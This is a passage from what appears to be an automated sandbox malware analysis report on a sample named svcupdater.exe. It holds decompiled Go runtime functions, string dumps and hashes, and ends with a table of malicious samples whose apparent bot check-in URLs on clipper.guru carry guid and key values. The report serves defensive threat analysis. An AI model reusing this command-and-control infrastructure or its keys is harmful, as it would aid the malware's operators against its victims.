						_v56 = 0x15;
						L00358A00(_t78);
						goto L9;
					}
					L2:
					_v16 = _t75;
					_v24 = _t76;
					_t72 =  *((intOrPtr*)(_t76 + 0x38));
					_v48 = _t72;
					if(_t75 != _t72 ||  *((intOrPtr*)(_t76 + 4)) != 1) {
						L7:
						_v40 = _t60;
						L0035A200( *((intOrPtr*)(_t76 + 4)), _t78);
						 *_t81 = 0x603024;
						_v56 = 0xc;
						L0035AC40(_t48, _t49, _t51, _t52, _t53, _t78);
						 *_t81 = _v16;
						L0035ABE0(_t48, _t49, _t51, _t52, _t53, _t77, _t78);
						 *_t81 = 0x6011db;
						_v56 = 6;
						L0035AC40(_t48, _t49, _t51, _t52, _t53, _t78);
						 *_t81 = _v24;
						L0035ABE0(_t48, _t49, _t51, _t52, _t53, _t77, _t78);
						 *_t81 = 0x6011e7;
						_v56 = 6;
						L0035AC40(_t48, _t49, _t51, _t52, _t53, _t78);
						 *_t81 = _v48;
						L0035AAC0(_t48, _t49, _t51, _t52, _t53, _t78);
						 *_t81 = 0x60262a;
						_v56 = 0xb;
						L0035AC40(_t48, _t49, _t51, _t52, _t53, _t78);
						 *_t81 = _v40;
						L0035A920(_t48, _t49, _t51, _t52, _t53, _t78);
						L0035A2A0(L0035A4E0(_t48, _t49, _t50, _t51, _t52, _t53, _t78), _t48, _t78);
						 *_t81 = 0x607f95;
						_v56 = 0x19;
						L00358A00(_t78);
						goto L8;
					}
					L4:
					if( *0x7e0010 != 0) {
						_v32 = _t60;
						 *_t81 = _t76;
						_t32 = L00377C40(__eax, _t48, _t51, _t52, _t53,  &_v8, _t83, _t84, _t85, _t86, _t87, _t88, _t89, _t90);
						_t60 = _v32;
						_t76 = _v24;
					}
					 *((long long*)( *((intOrPtr*)(_t60 + 0x30)) + 0xa0)) = 0;
					 *((long long*)(_t76 + 0x38)) = 0;
					 *((intOrPtr*)(_t76 + 4)) = 0;
					_a8 = _t76;
					return _t32;
					L10:
					L9:
					E00388B00(_t76, _t78);
				}
			}

0x00365340
0x00365340
0x00365340
0x00365340
0x00365340
0x00365354
0x00000000
0x00000000
0x0036535a
0x0036535a
0x0036535e
0x00365363
0x00365371
0x00365378
0x0036537c
0x00365386
0x003654cf
0x003654d6
0x003654da
0x003654e3
0x00000000
0x003654e3
0x0036538c
0x0036538c
0x00365391
0x00365397
0x0036539b
0x003653a3
0x003653fb
0x003653fe
0x00365403
0x0036540f
0x00365413
0x00365420
0x0036542a
0x0036542e
0x0036543a
0x0036543e
0x00365447
0x00365451
0x00365455
0x00365461
0x00365465
0x0036546e
0x00365478
0x00365480
0x0036548c
0x00365490
0x00365499
0x003654a3
0x003654a7
0x003654b1
0x003654bd
0x003654c1
0x003654ca
0x00000000
0x003654ca
0x003653ab
0x003653b2
0x003653e1
0x003653e6
0x003653ea
0x003653ef
0x003653f4
0x003653f4
0x003653b8
0x003653c3
0x003653cb
0x003653d2
0x003653e0
0x00000000
0x003654e9
0x003654e9
0x003654e9

Strings

m->p= next= p->m= prev= span= varp=% util(...), i = , not , val 390625<-chanAcceptAnswerArabicAugustBasic BrahmiCANCELCarianChakmaCommonCookieCopticExpectFormatFridayGOAWAYGOROOTGetACPGothicHangulHatranHebrewHyphenKaithiKhojkiLepchaLockedLycianLydianMondayPA, xrefs: 00365433
releasep: m=remote errorruntime: gp=runtime: sp=s ap traffics hs trafficself-preemptservices.exeshort bufferspanSetSpinesweepWaiterstraceStringstransmitfileunexpected )unknown portwirep: p->m= != sweepgen MB) workers= called from flushedWork heap_marked= id, xrefs: 00365408
releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: searchIdx = runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverabletimer data corruptiontrace/br, xrefs: 003654CF
p->status= s.nelems= schedtick= span.list= timerslen=, elemsize=, npages = , settings:.WithCancel/dev/stderr/dev/stdout/index.html30517578125: frame.sp=<invalid opBLAKE2b-256BLAKE2b-384BLAKE2b-512BLAKE2s-256Bad GatewayBad RequestClassHESIODCloseHandleCookie., xrefs: 00365485

Memory Dump Source

Source File: 00000000.00000002.255162576.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true

Associated: 00000000.00000002.255147193.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.256036731.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.256806186.0000000000794000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.256820104.000000000079E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.256857053.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.256879707.00000000007D1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.256893579.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.256905053.0000000000800000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.256919572.0000000000808000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.256925716.000000000080C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.256939772.000000000080D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.256980891.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_320000_IVO2cpEukR.jbxd

Similarity

API ID:
String ID: m->p= next= p->m= prev= span= varp=% util(...), i = , not , val 390625<-chanAcceptAnswerArabicAugustBasic BrahmiCANCELCarianChakmaCommonCookieCopticExpectFormatFridayGOAWAYGOROOTGetACPGothicHangulHatranHebrewHyphenKaithiKhojkiLepchaLockedLycianLydianMondayPA$ p->status= s.nelems= schedtick= span.list= timerslen=, elemsize=, npages = , settings:.WithCancel/dev/stderr/dev/stdout/index.html30517578125: frame.sp=<invalid opBLAKE2b-256BLAKE2b-384BLAKE2b-512BLAKE2s-256Bad GatewayBad RequestClassHESIODCloseHandleCookie.$releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: searchIdx = runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverabletimer data corruptiontrace/br$releasep: m=remote errorruntime: gp=runtime: sp=s ap traffics hs trafficself-preemptservices.exeshort bufferspanSetSpinesweepWaiterstraceStringstransmitfileunexpected )unknown portwirep: p->m= != sweepgen MB) workers= called from flushedWork heap_marked= id
API String ID: 0-3893332375
Opcode ID: fd621276293d9942aef902319eed4161de2e5687a79e4a896f074184f4fd89b0
Instruction ID: dbc93179cc2f3c3009799fa593ebdb1034b74dc38ca45a8d1a5b2ad1de56f254
Opcode Fuzzy Hash: fd621276293d9942aef902319eed4161de2e5687a79e4a896f074184f4fd89b0
Instruction Fuzzy Hash: 6641F17A10AF40C5DB11AF11F48435AB7A8F388B85F558161EACD4BB29DF79C1A8CB41

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: svcupdater.exePID: 6084, Parent PID: 1064COMMON

Non-executed Functions

Function 002C4E80 Relevance: 8.9, Strings: 7, Instructions: 122
COMMON

Download Yara Rule

C-Code - Quality: 57%

			E002C4E80(void* __ebx, void* __edx, long long* __rdx, void* __rsi, long long __rbp) {
				char _v8;
				long long _v16;
				long long _v24;
				char _v48;
				intOrPtr _v64;
				char _v72;
				long long _v80;
				long long _v88;
				long long _v96;
				void* _v104;
				long long _v120;
				long long _v144;
				long long _v152;
				long long _v160;
				long long _v168;
				void* _t50;
				void* _t68;
				void* _t69;
				void* _t71;
				void* _t72;
				void* _t73;
				long long _t85;
				long long _t90;
				intOrPtr _t94;
				long long _t100;
				long long _t101;
				long long _t105;
				long long _t107;
				long long* _t108;
				void* _t113;
				long long* _t114;

				L0:
				while(1) {
					L0:
					_t111 = __rbp;
					_t108 = __rdx;
					_t70 = __edx;
					_t68 = __ebx;
					if( &_v48 <=  *((intOrPtr*)( *((intOrPtr*)( *[gs:0x28])) + 0x10))) {
						goto L7;
					}
					L1:
					_t114 = _t113 - 0xb0;
					_v8 = __rbp;
					_t111 =  &_v8;
					_v104 = 0;
					 *_t114 = DuplicateHandle;
					_v168 = 0xffffffff;
					_v160 = 0xfffffffe;
					_v152 = 0xffffffff;
					_v144 =  &_v104;
					asm("xorps xmm0, xmm0");
					asm("movups [esp+0x28], xmm0");
					_v120 = 2;
					E002C5540( &_v8);
					_t85 =  *((intOrPtr*)( *((intOrPtr*)( *[gs:0x28])) + 0x30));
					_v24 = _t85;
					_t105 = _t85 + 0x308;
					_v16 = _t105;
					 *_t114 = _t105;
					L0029BF00(__edx,  &_v8);
					 *((long long*)(_v24 + 0x310)) = _v104;
					 *_t114 = _v16;
					L0029C160( &_v8);
					asm("xorps xmm0, xmm0");
					asm("movups [esp+0x68], xmm0");
					asm("movups [esp+0x78], xmm0");
					asm("movups [esp+0x88], xmm0");
					 *_t114 = VirtualQuery;
					_v168 =  &_v72;
					_t90 =  &_v72;
					_v160 = _t90;
					_v152 = 0x30;
					_t50 = E002C53C0(_t111);
					if(_v144 == 0) {
						L6:
						E002FBFA0();
						_v88 = _t90;
						L002CA200( *_t114, _t111);
						 *_t114 = 0x57c434;
						_v168 = 0x24;
						L002CAC40(_t68, _t69, _t71, _t72, _t73, _t111);
						 *_t114 = _v88;
						L002CA920(_t68, _t69, _t71, _t72, _t73, _t111);
						L002CA2A0(L002CA4E0(_t68, _t69, _t70, _t71, _t72, _t73, _t111), _t68, _t111);
						 *_t114 = 0x57b632;
						_v168 = 0x22;
						L002C8A00(_t111);
						goto L7;
					}
					L2:
					_t94 = _v64;
					_t107 = _t94 + 0x4000;
					_v96 = _t107;
					_t108 =  *((intOrPtr*)( *[gs:0x28]));
					_t101 =  *((intOrPtr*)(_t108 + 8));
					_v80 = _t101;
					if(_t107 > _t101 || _t101 - _t107 > 0x4000000) {
						L5:
						L002CA200(_t50, _t111);
						 *_t114 = 0x5757b5;
						_v168 = 0x13;
						L002CAC40(_t68, _t69, _t71, _t72, _t73, _t111);
						 *_t114 = _v96;
						L002CAAC0(_t68, _t69, _t71, _t72, _t73, _t111);
						 *_t114 =  &M00570A18;
						_v168 = 1;
						L002CAC40(_t68, _t69, _t71, _t72, _t73, _t111);
						 *_t114 = _v80;
						L002CAAC0(_t68, _t69, _t71, _t72, _t73, _t111);
						 *_t114 = 0x570a4f;
						_v168 = 2;
						L002CA2A0(L002CAC40(_t68, _t69, _t71, _t72, _t73, _t111), _t68, _t111);
						_t90 = 0x572e44;
						 *_t114 = 0x572e44;
						_v168 = 0xc;
						L002C8A00(_t111);
						goto L6;
					}
					L4:
					 *_t108 = _t107;
					_t100 = _t94 + 0x53a0;
					 *((long long*)(_t108 + 0x10)) = _t100;
					 *((long long*)(_t108 + 0x18)) = _t100;
					return E002FA560(_t50);
					L8:
					L7:
					E002F8B00(_t108, _t111);
				}
			}

0x002c4e80
0x002c4e80
0x002c4e80
0x002c4e80
0x002c4e80
0x002c4e80
0x002c4e80
0x002c4e99
0x00000000
0x00000000
0x002c4e9f
0x002c4e9f
0x002c4ea6
0x002c4eae
0x002c4eb6
0x002c4ec6
0x002c4eca
0x002c4ed3
0x002c4edc
0x002c4eea
0x002c4eef
0x002c4ef2
0x002c4ef7
0x002c4f00
0x002c4f15
0x002c4f19
0x002c4f23
0x002c4f2a
0x002c4f33
0x002c4f37
0x002c4f49
0x002c4f5a
0x002c4f60
0x002c4f65
0x002c4f68
0x002c4f6d
0x002c4f72
0x002c4f81
0x002c4f8a
0x002c4f8f
0x002c4f94
0x002c4f99
0x002c4fa2
0x002c4fad
0x002c50a5
0x002c50a5
0x002c50ad
0x002c50b2
0x002c50be
0x002c50c2
0x002c50cb
0x002c50d5
0x002c50d9
0x002c50e5
0x002c50f1
0x002c50f5
0x002c5100
0x00000000
0x002c5100
0x002c4fb3
0x002c4fb3
0x002c4fb8
0x002c4fbf
0x002c4fcd
0x002c4fd4
0x002c4fd8
0x002c4fe3
0x002c5017
0x002c5017
0x002c5023
0x002c5027
0x002c5030
0x002c503a
0x002c5040
0x002c504c
0x002c5050
0x002c5059
0x002c5063
0x002c5067
0x002c5073
0x002c5077
0x002c5085
0x002c508a
0x002c5091
0x002c5095
0x002c50a0
0x00000000
0x002c50a0
0x002c4ff1
0x002c4ff1
0x002c4ff4
0x002c4ffa
0x002c4ffe
0x002c5016
0x00000000
0x002c5106
0x002c5106
0x002c5106

Strings

bad g0 stackbad recoveryc ap trafficc hs trafficcaller errorcan't happencas64 failedchan receiveclose notifycontent-typecontext.TODOdumping heapend tracegcentersyscallexit status gcBitsArenasgcpacertracegetaddrinfowhost is downhttp2debug=1http2debug=2illegal , xrefs: 002C508A
runtime: g0 stack [runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssync.Cond is copiedtoo many open filesunexpected InstFailunexpected g statusunknown Go type: %vunknown certificateunknown cipher typeunknown hash , xrefs: 002C501C
0, xrefs: 002C4F99
VirtualQuery for stack base failedadding nil Certificate to CertPoolbad scalar length: %d, expected %dchacha20: wrong HChaCha20 key sizecrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapcrypto/rsa: missing pu, xrefs: 002C50EA
,-./0456:;<=>?@BCLMNOPSZ["\, xrefs: 002C5045
runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: marked free object in span runtime: mcall called on m->g0 stackruntime:, xrefs: 002C50B7
", xrefs: 002C50F5

Memory Dump Source

Source File: 00000004.00000002.518696466.0000000000291000.00000020.00000001.01000000.00000004.sdmp, Offset: 00290000, based on PE: true

Associated: 00000004.00000002.518687044.0000000000290000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.519766235.00000000004FB000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.520801582.0000000000704000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.520864902.000000000070E000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.520965124.000000000073B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.520976645.000000000073C000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.521005413.0000000000740000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.521017161.0000000000741000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.521028267.0000000000743000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.521043199.0000000000770000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.521055396.0000000000778000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.521068259.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.521079482.000000000077D000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.521145096.000000000077E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_290000_svcupdater.jbxd

Similarity

API ID:
String ID: "$,-./0456:;<=>?@BCLMNOPSZ["\$0$VirtualQuery for stack base failedadding nil Certificate to CertPoolbad scalar length: %d, expected %dchacha20: wrong HChaCha20 key sizecrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapcrypto/rsa: missing pu$bad g0 stackbad recoveryc ap trafficc hs trafficcaller errorcan't happencas64 failedchan receiveclose notifycontent-typecontext.TODOdumping heapend tracegcentersyscallexit status gcBitsArenasgcpacertracegetaddrinfowhost is downhttp2debug=1http2debug=2illegal $runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: marked free object in span runtime: mcall called on m->g0 stackruntime:$runtime: g0 stack [runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssync.Cond is copiedtoo many open filesunexpected InstFailunexpected g statusunknown Go type: %vunknown certificateunknown cipher typeunknown hash
API String ID: 0-1693190135
Opcode ID: 395242f8cd7ab25dd6171b8659f451491b912944ecc023e61412150f96f98ef0
Instruction ID: 0c4599ae4d81eb1a3e24cc96324dba7ba13df0f23c98403b792538953d65a84c
Opcode Fuzzy Hash: 395242f8cd7ab25dd6171b8659f451491b912944ecc023e61412150f96f98ef0
Instruction Fuzzy Hash: 6951F636529F8585DB10AF14F48536EB3A4F7897A4F508329EADC03BA9DF78C1A4CB41

Uniqueness

Uniqueness Score: -1.00%

Function 002D5340 Relevance: 5.1, Strings: 4, Instructions: 84
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E002D5340(void* __eax, long long __rbp, long long _a8) {
				char _v8;
				long long _v16;
				long long _v24;
				long long _v32;
				long long _v40;
				long long _v48;
				long long _v56;
				void* _t48;
				void* _t49;
				void* _t50;
				void* _t51;
				void* _t52;
				void* _t53;
				long long _t60;
				long long _t72;
				long long _t75;
				long long _t76;
				void* _t77;
				void* _t80;
				long long* _t81;
				void* _t83;
				void* _t84;
				void* _t85;
				void* _t86;
				void* _t87;
				void* _t88;
				void* _t89;
				void* _t90;

				L0:
				while(1) {
					L0:
					_t78 = __rbp;
					_t32 = __eax;
					if(_t80 <=  *((intOrPtr*)( *((intOrPtr*)( *[gs:0x28])) + 0x10))) {
						goto L9;
					}
					L1:
					_t81 = _t80 - 0x40;
					_v8 = __rbp;
					_t78 =  &_v8;
					_t60 =  *((intOrPtr*)( *[gs:0x28]));
					_t75 =  *((intOrPtr*)(_t60 + 0x30));
					_t76 =  *((intOrPtr*)(_t75 + 0xa0));
					if(_t76 == 0) {
						L8:
						 *_t81 = 0x576435;
						_v56 = 0x15;
						L002C8A00(_t78);
						goto L9;
					}
					L2:
					_v16 = _t75;
					_v24 = _t76;
					_t72 =  *((intOrPtr*)(_t76 + 0x38));
					_v48 = _t72;
					if(_t75 != _t72 ||  *((intOrPtr*)(_t76 + 4)) != 1) {
						L7:
						_v40 = _t60;
						L002CA200( *((intOrPtr*)(_t76 + 4)), _t78);
						 *_t81 = 0x573024;
						_v56 = 0xc;
						L002CAC40(_t48, _t49, _t51, _t52, _t53, _t78);
						 *_t81 = _v16;
						L002CABE0(_t48, _t49, _t51, _t52, _t53, _t77, _t78);
						 *_t81 = 0x5711db;
						_v56 = 6;
						L002CAC40(_t48, _t49, _t51, _t52, _t53, _t78);
						 *_t81 = _v24;
						L002CABE0(_t48, _t49, _t51, _t52, _t53, _t77, _t78);
						 *_t81 = 0x5711e7;
						_v56 = 6;
						L002CAC40(_t48, _t49, _t51, _t52, _t53, _t78);
						 *_t81 = _v48;
						L002CAAC0(_t48, _t49, _t51, _t52, _t53, _t78);
						 *_t81 = 0x57262a;
						_v56 = 0xb;
						L002CAC40(_t48, _t49, _t51, _t52, _t53, _t78);
						 *_t81 = _v40;
						L002CA920(_t48, _t49, _t51, _t52, _t53, _t78);
						L002CA2A0(L002CA4E0(_t48, _t49, _t50, _t51, _t52, _t53, _t78), _t48, _t78);
						 *_t81 = 0x577f95;
						_v56 = 0x19;
						L002C8A00(_t78);
						goto L8;
					}
					L4:
					if( *0x750010 != 0) {
						_v32 = _t60;
						 *_t81 = _t76;
						_t32 = L002E7C40(__eax, _t48, _t51, _t52, _t53,  &_v8, _t83, _t84, _t85, _t86, _t87, _t88, _t89, _t90);
						_t60 = _v32;
						_t76 = _v24;
					}
					 *((long long*)( *((intOrPtr*)(_t60 + 0x30)) + 0xa0)) = 0;
					 *((long long*)(_t76 + 0x38)) = 0;
					 *((intOrPtr*)(_t76 + 4)) = 0;
					_a8 = _t76;
					return _t32;
					L10:
					L9:
					E002F8B00(_t76, _t78);
				}
			}

0x002d5340
0x002d5340
0x002d5340
0x002d5340
0x002d5340
0x002d5354
0x00000000
0x00000000
0x002d535a
0x002d535a
0x002d535e
0x002d5363
0x002d5371
0x002d5378
0x002d537c
0x002d5386
0x002d54cf
0x002d54d6
0x002d54da
0x002d54e3
0x00000000
0x002d54e3
0x002d538c
0x002d538c
0x002d5391
0x002d5397
0x002d539b
0x002d53a3
0x002d53fb
0x002d53fe
0x002d5403
0x002d540f
0x002d5413
0x002d5420
0x002d542a
0x002d542e
0x002d543a
0x002d543e
0x002d5447
0x002d5451
0x002d5455
0x002d5461
0x002d5465
0x002d546e
0x002d5478
0x002d5480
0x002d548c
0x002d5490
0x002d5499
0x002d54a3
0x002d54a7
0x002d54b1
0x002d54bd
0x002d54c1
0x002d54ca
0x00000000
0x002d54ca
0x002d53ab
0x002d53b2
0x002d53e1
0x002d53e6
0x002d53ea
0x002d53ef
0x002d53f4
0x002d53f4
0x002d53b8
0x002d53c3
0x002d53cb
0x002d53d2
0x002d53e0
0x00000000
0x002d54e9
0x002d54e9
0x002d54e9

Strings

releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: searchIdx = runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverabletimer data corruptiontrace/br, xrefs: 002D54CF
p->status= s.nelems= schedtick= span.list= timerslen=, elemsize=, npages = , settings:.WithCancel/dev/stderr/dev/stdout/index.html30517578125: frame.sp=<invalid opBLAKE2b-256BLAKE2b-384BLAKE2b-512BLAKE2s-256Bad GatewayBad RequestClassHESIODCloseHandleCookie., xrefs: 002D5485
m->p= next= p->m= prev= span= varp=% util(...), i = , not , val 390625<-chanAcceptAnswerArabicAugustBasic BrahmiCANCELCarianChakmaCommonCookieCopticExpectFormatFridayGOAWAYGOROOTGetACPGothicHangulHatranHebrewHyphenKaithiKhojkiLepchaLockedLycianLydianMondayPA, xrefs: 002D5433
releasep: m=remote errorruntime: gp=runtime: sp=s ap traffics hs trafficself-preemptservices.exeshort bufferspanSetSpinesweepWaiterstraceStringstransmitfileunexpected )unknown portwirep: p->m= != sweepgen MB) workers= called from flushedWork heap_marked= id, xrefs: 002D5408

Memory Dump Source

Source File: 00000004.00000002.518696466.0000000000291000.00000020.00000001.01000000.00000004.sdmp, Offset: 00290000, based on PE: true

Associated: 00000004.00000002.518687044.0000000000290000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.519766235.00000000004FB000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.520801582.0000000000704000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.520864902.000000000070E000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.520965124.000000000073B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.520976645.000000000073C000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.521005413.0000000000740000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.521017161.0000000000741000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.521028267.0000000000743000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.521043199.0000000000770000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.521055396.0000000000778000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.521068259.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.521079482.000000000077D000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.521145096.000000000077E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_290000_svcupdater.jbxd

Similarity

API ID:
String ID: m->p= next= p->m= prev= span= varp=% util(...), i = , not , val 390625<-chanAcceptAnswerArabicAugustBasic BrahmiCANCELCarianChakmaCommonCookieCopticExpectFormatFridayGOAWAYGOROOTGetACPGothicHangulHatranHebrewHyphenKaithiKhojkiLepchaLockedLycianLydianMondayPA$ p->status= s.nelems= schedtick= span.list= timerslen=, elemsize=, npages = , settings:.WithCancel/dev/stderr/dev/stdout/index.html30517578125: frame.sp=<invalid opBLAKE2b-256BLAKE2b-384BLAKE2b-512BLAKE2s-256Bad GatewayBad RequestClassHESIODCloseHandleCookie.$releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: searchIdx = runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverabletimer data corruptiontrace/br$releasep: m=remote errorruntime: gp=runtime: sp=s ap traffics hs trafficself-preemptservices.exeshort bufferspanSetSpinesweepWaiterstraceStringstransmitfileunexpected )unknown portwirep: p->m= != sweepgen MB) workers= called from flushedWork heap_marked= id
API String ID: 0-3893332375
Opcode ID: fd621276293d9942aef902319eed4161de2e5687a79e4a896f074184f4fd89b0
Instruction ID: 93ee892e4115acb4caffee1df5db25c3df01f119c15e9830255cbce28fcb11d0
Opcode Fuzzy Hash: fd621276293d9942aef902319eed4161de2e5687a79e4a896f074184f4fd89b0
Instruction Fuzzy Hash: E4410276129F84C5DB50AF11F48436AB7A8F388788F458166EACD07B28DF78C5A4CF41

Uniqueness

Uniqueness Score: -1.00%

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
45.159.189.115	UQXEEX5Knp.exe	Get hash	malicious	Browse	clipper.guru/bot/online?guid=965969&key=79af1e5a26dc8ad71542cfa94bd6c11764fd9f9531b1e509278be5b87528ae46
	9x5WDCFiR3.exe	Get hash	malicious	Browse	clipper.guru/bot/online?guid=897506&key=0f183cb4288647960d1c458ed8456bf6524ebfbc16ebc53caab66c2376fd0eef
	47lBopdvBQ.exe	Get hash	malicious	Browse	clipper.guru/bot/online?guid=347688&key=79af1e5a26dc8ad71542cfa94bd6c11764fd9f9531b1e509278be5b87528ae46
	1D9DD4AE9D1BA20DBF36549110C16150525122F3AA7FD.exe	Get hash	malicious	Browse	clipper.guru/bot/online?guid=123716&key=79af1e5a26dc8ad71542cfa94bd6c11764fd9f9531b1e509278be5b87528ae46
	CE349E565197AA1AFAF25F21B5CDBB80880B96B34800F.exe	Get hash	malicious	Browse	clipper.guru/bot/online?guid=134349&key=79af1e5a26dc8ad71542cfa94bd6c11764fd9f9531b1e509278be5b87528ae46
	1A292CC8DA0DBDC4608018679F60E2EEB070C06374FDD.exe	Get hash	malicious	Browse	clipper.guru/bot/online?guid=226546&key=79af1e5a26dc8ad71542cfa94bd6c11764fd9f9531b1e509278be5b87528ae46
	49DEB035D46391E414506E10E5D394A9C371E61299FB5.exe	Get hash	malicious	Browse	clipper.guru/bot/online?guid=210979&key=79af1e5a26dc8ad71542cfa94bd6c11764fd9f9531b1e509278be5b87528ae46
	6C56B6A178C64ADEF96A65FAB45B58A7378B17262420A.exe	Get hash	malicious	Browse	clipper.guru/bot/online?guid=358075&key=79af1e5a26dc8ad71542cfa94bd6c11764fd9f9531b1e509278be5b87528ae46
	10C8242C6A5D98F805DBAFC6F19E4673067010F967CC5.exe	Get hash	malicious	Browse	clipper.guru/bot/online?guid=992547&key=79af1e5a26dc8ad71542cfa94bd6c11764fd9f9531b1e509278be5b87528ae46
	RM1Qrb7RzL.exe	Get hash	malicious	Browse	clipper.guru/bot/online?guid=675052&key=79af1e5a26dc8ad71542cfa94bd6c11764fd9f9531b1e509278be5b87528ae46
	1D1BCE6C4A6CDB2B2DB0AA80629110DB005A108D02127.exe	Get hash	malicious	Browse	clipper.guru/bot/online?guid=701188&key=79af1e5a26dc8ad71542cfa94bd6c11764fd9f9531b1e509278be5b87528ae46
	FE6AC02E4C9283F8E678E7F0409F49C03234E9A4D72C5.exe	Get hash	malicious	Browse	clipper.guru/bot/online?guid=580913&key=79af1e5a26dc8ad71542cfa94bd6c11764fd9f9531b1e509278be5b87528ae46
	0DEA9964C6E2AD110AD9A26A2E25417AFA7B2ED990362.exe	Get hash	malicious	Browse	clipper.guru/bot/online?guid=721680&key=79af1e5a26dc8ad71542cfa94bd6c11764fd9f9531b1e509278be5b87528ae46
	C037A2D164F8327B4236D4A4A22FBD3B676C4B94A2245.exe	Get hash	malicious	Browse	clipper.guru/bot/online?guid=580913&key=79af1e5a26dc8ad71542cfa94bd6c11764fd9f9531b1e509278be5b87528ae46
	02C1C4241E1211580F078778611AE7C11D6F7A5BDEF75.exe	Get hash	malicious	Browse	clipper.guru/bot/online?guid=855271&key=79af1e5a26dc8ad71542cfa94bd6c11764fd9f9531b1e509278be5b87528ae46
	DDC401C77FCD4153860CC36056D6C4FC725910E38C09E.exe	Get hash	malicious	Browse	clipper.guru/bot/online?guid=364339&key=79af1e5a26dc8ad71542cfa94bd6c11764fd9f9531b1e509278be5b87528ae46
	4A75A23C13301872F46F4530B071BC4534A211435D5A8.exe	Get hash	malicious	Browse	clipper.guru/bot/online?guid=648351&key=79af1e5a26dc8ad71542cfa94bd6c11764fd9f9531b1e509278be5b87528ae46
	5484C7DEC94E79C169B6D8F9BEE8D186A5FB37D75C995.exe	Get hash	malicious	Browse	clipper.guru/bot/online?guid=082561&key=79af1e5a26dc8ad71542cfa94bd6c11764fd9f9531b1e509278be5b87528ae46
	2F0A55A8E0663453F3EDF65EF50844FA1F4B161888842.exe	Get hash	malicious	Browse	clipper.guru/bot/online?guid=910646&key=79af1e5a26dc8ad71542cfa94bd6c11764fd9f9531b1e509278be5b87528ae46
	1EB3BEFDF4978A7899E2B7CA8297D0A3ABF2B1FCBA64E.exe	Get hash	malicious	Browse	clipper.guru/bot/online?guid=632922&key=79af1e5a26dc8ad71542cfa94bd6c11764fd9f9531b1e509278be5b87528ae46

